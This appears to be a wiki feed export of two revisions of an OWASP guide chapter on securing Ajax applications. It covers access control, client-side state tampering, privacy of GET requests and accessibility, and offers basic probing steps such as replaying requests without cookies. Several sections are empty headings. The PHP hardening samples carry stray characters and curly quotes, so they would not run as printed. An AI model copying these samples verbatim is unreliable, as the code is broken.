Attackers will be able to fraudulently perform transactions if there is no shared state between the two systems. This attack only requires that the attackers can tamper with embedded state on the client and if market.somebiginvestmentfirm.com foolishly trusts calls from Ajax callers without first checking with example.com. However, if example.com is simply one of hundreds of brokers, then this scenario is very unlikely to be secure no matter how it’s sliced or diced. This particular scenario requires federated identity, which is discussed further in the Authentication chapter.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
You are vulnerable to this issue if:&lt;br /&gt;
&lt;br /&gt;
* Sensitive state is passed through the client to the second server in the foolish hope it will be trusted by the second server&lt;br /&gt;
&lt;br /&gt;
* The Ajax endpoints are hosted on a different server with unsharable session state&lt;br /&gt;
&lt;br /&gt;
* The second server is addressed by a URL that would prevent the cookies from the first session being used by the second server. Most browsers do not allow an application running on &amp;lt;u&amp;gt;ws.example.com&amp;lt;/u&amp;gt; to read cookies from &amp;lt;u&amp;gt;www.example.com&amp;lt;/u&amp;gt;. However, browsers will allow cookies to be read from &amp;lt;u&amp;gt;http://example.com&amp;lt;/u&amp;gt; but you should not rely on this as an attacker may spoof another URL such as attack.example.com and set cookies for example.com. &lt;br /&gt;
&lt;br /&gt;
* If the web service or other endpoint cannot obtain data from the first server’s session state for any other reason (such as incompatible technologies, like running a PHP web application and the Ajax application is trying to consume ASP.NET web services).&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
There are at least three methods to get around this issue:&lt;br /&gt;
&lt;br /&gt;
* Do not host the receiving end point on a different server; simply scale the entire application up (web services and all) on the same host. This allows trivially easy access to the trusted session state.&lt;br /&gt;
&lt;br /&gt;
* Stash the state in a database, and pass a cryptographically strong random key from the first server to the second server via the client. This method is far slower, more code intensive, and less scalable than the first solution.&lt;br /&gt;
&lt;br /&gt;
* Use federated authentication to provide a shared authorization context and verify it on the second server. This is usually very slow, but it is safe as long as the single sign-on (SSO) implementation is relatively secure and does not allow replay attacks.&lt;br /&gt;
&lt;br /&gt;
A solution that will not work is to simply pass the sensitive state via the client. A hostile client can tamper with the username, role, or any other sensitive state, so it cannot be trusted to transmit such data safely.&lt;br /&gt;
&lt;br /&gt;
==State management ==&lt;br /&gt;
&lt;br /&gt;
The DOM is designed to be manipulated and visible within the browser. It was never designed to be a secure storage area, but rather as a method of controlling how the page looks and behaves. Therefore, secure applications need to take care with client side storage of secure state.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
==Tamper resistance  ==&lt;br /&gt;
&lt;br /&gt;
If state is stored on the client, the attacker is able to easily manipulate this state using a DOM inspection tool, or simply by re-writing to their own API. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable: '''&lt;br /&gt;
&lt;br /&gt;
* Use DOM inspection tools like FireBug (https://addons.mozilla.org/firefox/1843/) – can you see client side state?&lt;br /&gt;
&lt;br /&gt;
* Can you change the state?&lt;br /&gt;
&lt;br /&gt;
* Use proxy tools, such as Paros, Spike Proxy, or WebScarab. When you see client-side state, can you modify it or inject interesting traffic? Does the server-side code detect the change in a reasonable way? &lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Do not obfuscate client side state for no purpose – this requires more code and is trivially bypassed by advanced attackers&lt;br /&gt;
&lt;br /&gt;
* Applications should maintain a copy of all client-side state, and only accept back state that the user is authorized to change, such as a form fields or settings which they can change in the web UI&lt;br /&gt;
&lt;br /&gt;
* Ensure that the action is authorized before performing any activity on submitted data&lt;br /&gt;
&lt;br /&gt;
* Include server-side validation, preferring white listing to blacklisting.&lt;br /&gt;
&lt;br /&gt;
==Privacy  ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax clients use XMLHttpRequest with GET requests. These embed the data in the “URL”, and even though the data is generally not visible to the user, it is available in the browser history. &lt;br /&gt;
&lt;br /&gt;
Phishers favor GET requests. They love to use links embedded in e-mails. If coupled with poorly written code that does not assert authorization, such code will allow the phisher to commit an unauthorized transaction.&lt;br /&gt;
&lt;br /&gt;
Even if POSTs are used, private data can be cached in intermediate untrusted caches if the application uses HTTP rather than HTTPS connections. &lt;br /&gt;
&lt;br /&gt;
Most browsers have GET data limits, which can be as little as 2 KB. POSTs do not have this limitation, allowing far more data to be sent in any one request. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are at risk '''&lt;br /&gt;
&lt;br /&gt;
* Use a proxy tool, like Paros, Spike, or WebScarab to determine the mode of the Ajax interaction. If it is GET, you are potentially at risk.&lt;br /&gt;
&lt;br /&gt;
* Look at the data – does it contain details such as usernames, passwords, names, addresses, medical history, bank account, tax, or other private details? If so, you are at risk.&lt;br /&gt;
&lt;br /&gt;
* If you are sending sensitive data, can you access the Ajax endpoint via HTTP? If so, you are at risk from privacy breaches.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Generally, regardless of data value, use only POST requests. &lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode client example''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
var cp = new cpaint();&lt;br /&gt;
&lt;br /&gt;
cp.set_transfer_mode(‘POST’);'&lt;br /&gt;
&lt;br /&gt;
…&lt;br /&gt;
&lt;br /&gt;
cp.call(‘processCreditCard.php’, ‘setCCDetail’, document.getElementById(‘creditcardnumber’), document.getElementById(‘creditcardexpiry’),&lt;br /&gt;
&lt;br /&gt;
document.getElementById(‘ccv’));&lt;br /&gt;
&lt;br /&gt;
CPaint POST transfer mode server example&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php?  &lt;br /&gt;
&lt;br /&gt;
function setCCDetail($cc, $expiry, $ccv)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// check that the session is logged in ?&lt;br /&gt;
&lt;br /&gt;
	assert_login();&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
	// check that the user has the USER role to prevent &lt;br /&gt;
&lt;br /&gt;
// guest and admin access&lt;br /&gt;
&lt;br /&gt;
	assert_role(‘USER’);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Validate data and business rules&lt;br /&gt;
&lt;br /&gt;
if ( is_credit_card($cc) &amp;amp;&amp;amp; is_expiry_date($expiry) &amp;amp;&amp;amp; is_numeric($ccv) )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// Set the credit card details&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;cc = $cc;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;exp = $expiry;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;ccv = $ccv;&lt;br /&gt;
&lt;br /&gt;
return true;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// Data failed validation and business rules&lt;br /&gt;
&lt;br /&gt;
return false;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Include server-side code that enforces the source of the data, so that it only comes from the POST, not from the request, GET, environment, or cookie data.&lt;br /&gt;
&lt;br /&gt;
If data transiting Ajax endpoints is protected by the users’ privacy laws, ensure that the data transits only over HTTPS using SSLv3 or TLS 1.0 or better and block HTTP communications.&lt;br /&gt;
&lt;br /&gt;
==Proxy Façade  ==&lt;br /&gt;
&lt;br /&gt;
Many toolkits, particularly PHP toolkits, allow you to register a class or file with the Ajax toolkit and thus call that method. CPaint for example works in this manner. However, some toolkits are worse than others – they allow '''any''' in context PHP function to be called, including system() and eval(). Others are not robust against PHP code injection – see below for more details.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If your toolkit works by registering classes or functions, try:&lt;br /&gt;
&lt;br /&gt;
* Calling a system call, such as system() or printf()&lt;br /&gt;
&lt;br /&gt;
* Calling another function in your code, but one which has not been registered&lt;br /&gt;
&lt;br /&gt;
* Try using some of the language features, such as ` for PHP for example &lt;br /&gt;
&lt;br /&gt;
If any of these attacks work, your code (and any code using this framework) is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
In general, such methods of calling server side code are fraught with danger. It’s better to provide a limited interface, called a proxy façade, to only allow access to permitted functions. &lt;br /&gt;
&lt;br /&gt;
This would also allow authorization checks and basic validation to be performed before calling previously internal code. &lt;br /&gt;
&lt;br /&gt;
==SOAP Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XMLRPC Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DOM Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XML Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==JSON (JavaScript Object Notation) Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Encoding safety ==&lt;br /&gt;
&lt;br /&gt;
Ajax applications are particularly prone to encoding attacks as JavaScript understands several encodings (depending on the browser, locale and code page), whilst the scripting language itself is primitive when it comes to providing robust encoding and decoding utilities. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Do not rely heavily upon JavaScript processing the encoding or decoding capabilities for the client. Send data pre-encoded to the client, and receive data and handle it correctly. &lt;br /&gt;
&lt;br /&gt;
For more details, see the Canonicalization chapter later in this book.&lt;br /&gt;
&lt;br /&gt;
==Auditing ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Accessibility ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax toolkits and applications are inaccessible. Rarely do they pass even basic W3C WAI validation, and do not have accessible alternative paths. Some toolkits, such as Tibco General Interface, crash the browser if a larger text size is chosen. This is completely unacceptable and worse, completely preventable. Being a “rich” interface does not excuse disability requirements. Based upon the US Census conducted in 2000, around 19.1% of the total US population has a disability of some kind (with similar levels elsewhere on the planet). Locking out 20% of your potential users from using your application is unacceptable and is in fact, illegal in most countries. &lt;br /&gt;
&lt;br /&gt;
Nearly all Western disability discrimination laws are the same – they require accessibility unless it is a justifiable hardship. They do not distinguish between open source or closed source, for profit or charitable, government or corporate – their application is universal.&lt;br /&gt;
&lt;br /&gt;
The techniques for creating accessible applications are widely known and have been documented for more than ten years. Accessibility evaluation tools are included or available as an option in every web development environment. As it does not cost a great deal to write new software to be accessible (the primary cost is in the testing), it is never a justifiable hardship to be accessible. &lt;br /&gt;
&lt;br /&gt;
Over the last few years, case law has firmly solidified upon the side of the disabled (see the references, particularly the SOCOG / IBM decision). If you now deliberately write inaccessible software, it would be negligent in the same way that building new buildings without accessibility aides such as ramps and lifts to allow wheelchair access. This stuff is not rocket science, it does not cost a lot of money to do, and lastly, you may need it one day.&lt;br /&gt;
&lt;br /&gt;
'''How to identify if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
* Read the W3C WAI guidelines and ensure your application has alternate accessible paths, and adheres to basic accessibility guidelines.&lt;br /&gt;
&lt;br /&gt;
* Identify suitable evaluation tools for your development environment if it does not already contain them. Fix issues found by these tools and re-test.&lt;br /&gt;
&lt;br /&gt;
* Try using the basic accessibility tools built into your operating system to see if your code works in high contrast, different color schemes, resize the text elements in your browser (in Firefox use Control-+ key to do this, Text Size -&amp;gt; Larger in Internet Explorer 6.0 or use the zoom control on the bottom right of the screen in IE 7), (Windows specific) set the font resolution to high DPI to emulate large fonts, choose big default fonts in the browser, use the screen magnification tool, and test various basic screen readers. If your application fails any of these tests, you are vulnerable. &lt;br /&gt;
&lt;br /&gt;
* Once you are satisfied your application should have a reasonable shot at passing full testing, identify suitable accredited accessibility test firms or similarly qualified resources who can test your application using actual disability tools and provide qualified feedback. In general, unless your application is very simple, you should fix any issues found.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Develop with accessibility in mind. Just like security, the sooner you do it, the cheaper this activity becomes and the more likely your application will be accessible.&lt;br /&gt;
&lt;br /&gt;
* Test in house regularly. If possible, employ staff or volunteers who require such accessibility; they will let you know the best choices for full featured screen readers, Braille devices, and magnification and other accessibility aides. Let them test your application and provide feedback. &lt;br /&gt;
&lt;br /&gt;
* If you are likely to sell to corporate or government organizations, ensure that all applications are tested by an accredited accessibility testing firm. Fix all the issues they identify.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
AJAX Spell Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/13986/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
CPaint Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14565/discuss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
XML-RPC Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14088/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maguire vs SOCOG/IBM, Nublog&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.contenu.nu/socog.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
W3C, Existing accessibility tools&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w3.org/WAI/ER/existingtools.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
US Census 2000: Disability Status 2000&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.census.gov/prod/2003pubs/c2kbr-17.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;br /&gt;
[[Category:AJAX]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59646</id>
		<title>Ajax and Other &quot;Rich&quot; Interface Technologies</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59646"/>
				<updated>2009-04-29T12:21:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control: Authentication and Authorization */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
'''''Style is time’s fool. Form is time’s student – Stewart Brand '''''&lt;br /&gt;
&lt;br /&gt;
Ajax applications, often styled as “Web 2.0”, are not a form of magic security pixie dust. Instead, there are two classes of applications: secure and insecure. This is independent of the use of Ajax or similar technologies that preceded it, such as Flash, applets, or ActiveX. With some effort, Ajax applications can be secure. Unfortunately, many are not, which is the '''''raison d’être''''' of this chapter.&lt;br /&gt;
&lt;br /&gt;
The acronym AJAX stands for Asynchronous JavaScript and XML. These technologies underpinning Ajax are not new – they first appeared in 1998 with Microsoft Outlook Web Access in Exchange Server 5.5. “Web 2.0” was defined by Tim O’Reilly to mean highly peer-to-peer dynamic applications. Such applications include del.icio.us library that allows users to share their libraries’ details, or Flickr that allows users to share their photos in a highly interactive way. We define “Ajax applications” as those that use the XMLHttpRequest object to asynchronously call the server and receive replies, regardless of how they handle or display the received data, or if they are public peer-to-peer low value applications such as forum software or highly sensitive private data, such as a tax return lodgment application.&lt;br /&gt;
&lt;br /&gt;
Ajax enabled applications aim to increase the interactivity and richness of the web interface. Secure Ajax applications are achievable at minimal cost increase as long as security is considered during design and tested throughout development. &lt;br /&gt;
&lt;br /&gt;
Compliance with disability laws is mandatory for all government and most corporate organizations. Ajax framework developers who wish to be used by these types of organizations must ensure their code supports common accessibility aides. Ajax framework users should select frameworks that produce accessible output and design their applications to be accessible and test regularly. In most countries, to do otherwise is simply deliberate negligence, and is often harshly punished by the courts. &lt;br /&gt;
&lt;br /&gt;
Ajax applications face '''''exactly the same '''''security issues as all other web applications, plus they add their own particular set of risks that must be correctly managed. By their complex, bidirectional, and asynchronous nature, Ajax applications increase attack surface area. &lt;br /&gt;
&lt;br /&gt;
Use of Ajax (or any rich interface) requires careful consideration of architecture, server-side access control, state management, and strong validation to prevent attacks. Without considering these basic controls, even brochure-ware websites, such as car manufacturer websites, can be a hazard to both the user and the web site owner’s reputation and thus sales.&lt;br /&gt;
&lt;br /&gt;
At the time of writing, there is a multitude of Ajax frameworks and add-ons, and many more being written every day. Users of Ajax frameworks should ensure that their chosen framework meets the security risks of their particular application, and does not impose an unsecurable architecture upon them. &lt;br /&gt;
&lt;br /&gt;
Developers of Ajax frameworks should investigate the controls presented in this chapter, and associated controls documented throughout the rest of this book to ensure that their approach is simple, accessible, and secure.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that AJAX (and all “rich” interactive interfaces, such as Flash and Shockwave) have adequate:&lt;br /&gt;
&lt;br /&gt;
* Secure Communications&lt;br /&gt;
&lt;br /&gt;
* Authentication and Session Management&lt;br /&gt;
&lt;br /&gt;
* Access Control &lt;br /&gt;
&lt;br /&gt;
* Input Validation&lt;br /&gt;
&lt;br /&gt;
* Error Handling and Logging&lt;br /&gt;
&lt;br /&gt;
To prevent applications from being attacked using known attack vectors, such as unauthorized access, injection attacks, and so on.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
* All Server Platforms&lt;br /&gt;
&lt;br /&gt;
* Web applications which use Ajax, ActiveX, Flash or Shockwave&lt;br /&gt;
&lt;br /&gt;
* Clients which are required to use such applications&lt;br /&gt;
&lt;br /&gt;
==Architecture ==&lt;br /&gt;
&lt;br /&gt;
Appropriate security architecture should be considered when implementing Ajax front ends. Some Ajax frameworks will proudly display that they are 100% client based, with no server side controls, such as Tibco and Atlas (an Ajax framework for .NET). &lt;br /&gt;
&lt;br /&gt;
Strong security architecture provides adequate defense in depth, and architecturally correct placement of key security controls. For more details, see the Security Architecture chapter.&lt;br /&gt;
[[Category:FIXME|I wanted to make Security Architecture a link, but I am not sure what section it refers to]]&lt;br /&gt;
&lt;br /&gt;
For some types of applications, such as brochure-ware and non-interactive applications, such as stock tickers, this is acceptable security architecture as the risks are low – it would be hard to obviate the security controls to lose actual money. However, as the risk of the application increases, the threats and countermeasures required also increase. &lt;br /&gt;
&lt;br /&gt;
'''Architecture by example '''&lt;br /&gt;
&lt;br /&gt;
For the purposes of this section, irs.gov.ex, a taxation department of a fictitious country, has decided to implement an Ajax enabled electronic lodgment and tracking service for all of its 100 million taxpayers. A key reason to move to the new system is to reduce the workload on existing staff for the 90+% of tax returns that could be processed automatically … as long as the taxpayers do not deliberately lie, deceive, or cheat the system. Which of course, they do regularly. &lt;br /&gt;
&lt;br /&gt;
They bought a fancy new Enterprise Service Bus (ESB), to which they hooked up their old but incredibly reliable mainframe backend, their SAP R/3 implementation that writes the checks and tax invoices, and several other key systems. &lt;br /&gt;
&lt;br /&gt;
This particular ESB, like many on the market today, has no data validation, authentication, or authorization controls of its own; it is a simple web-service integration layer. The ESB expects that the underlying systems will perform adequate validation and authorization to prevent abuse, as the software company that wrote the ESB expected that all calling systems would be trusted, internal systems. Hooking up a dynamic web site where the users are known to be relentless, eager, and motivated tax avoiders changes the risk profile of a previously internal system with trusted staff.&lt;br /&gt;
&lt;br /&gt;
The tax department does not want to change existing systems as they are in production and stable. More to the point, they cannot change their mainframe code easily - their skilled mainframe programmers either were promoted to senior management or retired 15 years ago, and it would be extremely costly to hire new mainframe developers, and impossible to change how the third party systems work, like SAP or their anti-fraud system. &lt;br /&gt;
&lt;br /&gt;
Old code, such as COBOL CICS transactions, or previously internal only systems such as SAP R/3, have a different trust model than highly dynamic Internet connected websites. It is highly likely such systems have never been tested against now common attacks, such as HTML injection (XSS), DOM injection, XML query attacks, or similar. Without any intermediate code to protect these older systems, they are at immense risk.&lt;br /&gt;
&lt;br /&gt;
The tax department selected a simple solution in the belief it will save money. In this first example, the bulk of the business logic is contained in deployed JavaScript applications. All of the business logic, validation, and state are contained in the client’s browser, and it makes direct calls to the enterprise service bus. &lt;br /&gt;
&lt;br /&gt;
However, this model is simply broken: the previously generic process orchestration service will need to become far more aware of the caller’s identity (to provide authentication and enforce authorization), maintain secure state, and provide validation services that have previously been performed on the client. &lt;br /&gt;
&lt;br /&gt;
[[Image:Insecure Security and state maintained on the client.gif]]&lt;br /&gt;
&lt;br /&gt;
This security model is akin to leaving the keys to the Reserve Bank at the train station notice board. There is no method of protecting this model without significant replication of the business logic and re-validating all the state at the enterprise service bus, or similar web service endpoints. &lt;br /&gt;
&lt;br /&gt;
Many enterprises, including irs.gov.ex, have taken to service oriented architecture (SOA), which uses web services enabling re-use of pre-existing transactions and systems, such as SAP or Siebel, or custom transactions running on mainframes. If an Ajax framework is connected to such SOA endpoints, such as an enterprise service bus, or directly to a backend data warehouse or other persistent store, there is no ability to validate the calling identity, authorize the transaction, validate the data, or any other normal security activity. So this model will not do. &lt;br /&gt;
&lt;br /&gt;
In the next model, which is how most PHP application frameworks work today, the Ajax xmlrpc endpoint is not necessarily well integrated with the main application. &lt;br /&gt;
&lt;br /&gt;
[[Image: Insecure Ajax Web Service Endpoint separate from the main application.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, if the Ajax endpoint cannot or does not access secure state, or associate the call with the active session, a hostile caller could emulate an active session and call protected resources with minimal skills or tools. This vulnerability has already been demonstrated with several popular Ajax PHP toolkits on Bugtraq, and probably applies to other less well-known toolkits for other languages and platforms.&lt;br /&gt;
&lt;br /&gt;
The best way to protect both of these models is to bring them back to the normal three-tier application model:&lt;br /&gt;
&lt;br /&gt;
[[Image: Better Shared business logic in the middle tier with different front ends.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, which is akin to how GMail works, the application is still significantly Ajax enabled, and provides a rich experience to the user. However, this code is backed by:&lt;br /&gt;
&lt;br /&gt;
* A solid session management scheme to ensure that authentication and authorization is performed in a trusted part of the architecture&lt;br /&gt;
&lt;br /&gt;
* Data validation is performed in both directions on the server-side at various layers to limit or prevent injection and other attacks&lt;br /&gt;
&lt;br /&gt;
* All calls to the backend services are performed by trusted server-side business logic&lt;br /&gt;
&lt;br /&gt;
* The layered architecture allows reasonable trust of the caller at the ESB level as the data has been significantly authorized and validated&lt;br /&gt;
&lt;br /&gt;
This means that the ESB and its published services, such as 40 year old COBOL code, do not need to be particularly aware of the implications of being made available to the Internet. This enables higher levels of re-use and reduces costs.&lt;br /&gt;
&lt;br /&gt;
Although more complex to the project implementing the Ajax enabled application, to the funding business, this architecture is the cheapest way of maintaining security whilst avoiding updating or maintaining ancient or third party code.&lt;br /&gt;
&lt;br /&gt;
Selecting the correct architecture is unfortunately not a checklist – it is a balance of risk versus cost. However, as demonstrated in this section, client-side heavy architecture models are completely untrustworthy for transactional systems and should be avoided.&lt;br /&gt;
&lt;br /&gt;
==Access control: Authentication and Authorization ==&lt;br /&gt;
[[Category:FIXME|Starting here, should these sections be part of this article? Or do they go somewhere else with links here?]]&lt;br /&gt;
&lt;br /&gt;
Ajax code uses the XMLHttpRequest object, which will send the cookies of the current browser context through with each request. For applications which have user sessions, it is vital that normal authentication paths are used to ensure that the caller is known to the application. Brochure-ware applications can skip this section as they allow anonymous calling.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If you have transactions or calls that are not to be used by anonymous callers, check that client-side code cannot call them without an established user context.&lt;br /&gt;
&lt;br /&gt;
To do this: &lt;br /&gt;
&lt;br /&gt;
* Fire up your favorite proxy tool, such as WebScarab&lt;br /&gt;
&lt;br /&gt;
* Generate an authenticated XMLHttpRequest using the browser&lt;br /&gt;
&lt;br /&gt;
* Right click on the resulting entry in WebScarab, click “Re-send” &lt;br /&gt;
&lt;br /&gt;
* Edit out the cookie&lt;br /&gt;
&lt;br /&gt;
See if a valid result is returned. If yes, you are vulnerable. Repeat for every Ajax enabled server-side service.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that every Ajax callable function, whether XMLRPC, custom code, or a web service verify the session and authorization. &lt;br /&gt;
&lt;br /&gt;
For example, in typical Ajax style, CPaint uses this insecure example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php?  &lt;br /&gt;
&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
return($sales_amount * 0.075);?&lt;br /&gt;
&lt;br /&gt;
}?&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Let’s add some session authentication, authorization and data validation, and business rule validation: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
''&amp;lt;?php?  ''&lt;br /&gt;
&lt;br /&gt;
''function calculate_tax($sales_amount)''&lt;br /&gt;
&lt;br /&gt;
''{''&lt;br /&gt;
&lt;br /&gt;
''// check that the session is logged in ?''&lt;br /&gt;
&lt;br /&gt;
''	assert_login();''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	// check that the user has the USER role to prevent ''&lt;br /&gt;
&lt;br /&gt;
''// guest and admin access''&lt;br /&gt;
&lt;br /&gt;
''	assert_role(‘USER’);''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''// Validate data and business rules''&lt;br /&gt;
&lt;br /&gt;
''if ( is_numeric($sales_amount) &amp;amp;&amp;amp; $sales_amount &amp;gt; 0 )''&lt;br /&gt;
&lt;br /&gt;
''{''&lt;br /&gt;
&lt;br /&gt;
''// Perform the calculation and return''&lt;br /&gt;
&lt;br /&gt;
''return($sales_amount * 0.075);?''&lt;br /&gt;
&lt;br /&gt;
''}''&lt;br /&gt;
&lt;br /&gt;
''// Data failed validation and business rules''&lt;br /&gt;
&lt;br /&gt;
''return -1;''&lt;br /&gt;
&lt;br /&gt;
''}''&lt;br /&gt;
&lt;br /&gt;
''?&amp;gt;''&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With these simple changes, we ensure that:&lt;br /&gt;
&lt;br /&gt;
* (Authentication) Enforce that the user is logged on&lt;br /&gt;
&lt;br /&gt;
* (Authorization and Compliance) Enforce role authorization and provide SOX-compliant segregation of duties&lt;br /&gt;
&lt;br /&gt;
* (Data Validation) Ensure that the data is safe to perform our calculation&lt;br /&gt;
&lt;br /&gt;
* (Business Rule Validation) Lastly, check the data is within acceptable business rule boundaries as it is not a good idea to calculate tax for negative and zero values&lt;br /&gt;
&lt;br /&gt;
Obviously, performing a tax rate calculation is not that important, but if it was an insurance premium calculator (which uses highly sensitive actuary data) this is the minimum you would expect to see for sensitive code.&lt;br /&gt;
&lt;br /&gt;
